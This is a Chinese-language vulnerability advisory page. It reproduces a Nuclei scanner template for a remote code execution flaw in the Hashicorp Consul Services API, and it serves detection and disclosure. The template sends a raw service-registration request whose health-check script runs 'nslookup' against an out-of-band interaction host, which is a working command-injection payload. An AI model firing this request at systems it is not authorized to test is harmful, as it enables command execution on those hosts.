hashicorp-consul-rce: Hashicorp Consul Services API - Remote Code Execution

日期: 2025-08-01 | 影响软件: Hashicorp Consul | POC: 已公开

漏洞描述

Hashicorp Consul Services API is vulnerable to an attack that can be leveraged to perform remote command execution on Consul nodes.

PoC代码[已公开]

id: hashicorp-consul-rce

info:
  name: Hashicorp Consul Services API - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Hashicorp Consul Services API is vulnerable to an attack that can be leveraged to perform remote command execution on Consul nodes.
  reference:
    - https://www.exploit-db.com/exploits/46074
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: hashicorp,rce,oast,intrusive,edb,vuln

http:
  - raw:
      - | # Create USER
        PUT /v1/agent/service/register HTTP/1.1
        Host: {{Hostname}}

        {
          "ID": "{{randstr}}",
          "Name": "{{randstr}}",
          "Address": "127.0.0.1",
          "Port": 80,
          "check": {
            "script": "nslookup {{interactsh-url}}",
            "interval": "10s",
            "Timeout": "86400s"
          }
        }

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 4b0a00483046022100a9413c79fb9d21cc10e2cdb596fbd5eac4f976da8ca3affb900909eff74c2b2d022100b8e350c91231dadeb018e06b098a7ccd9a757d43132e2c2c3629529c7608cc0a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/hashicorp-consul-rce.yaml

相关漏洞推荐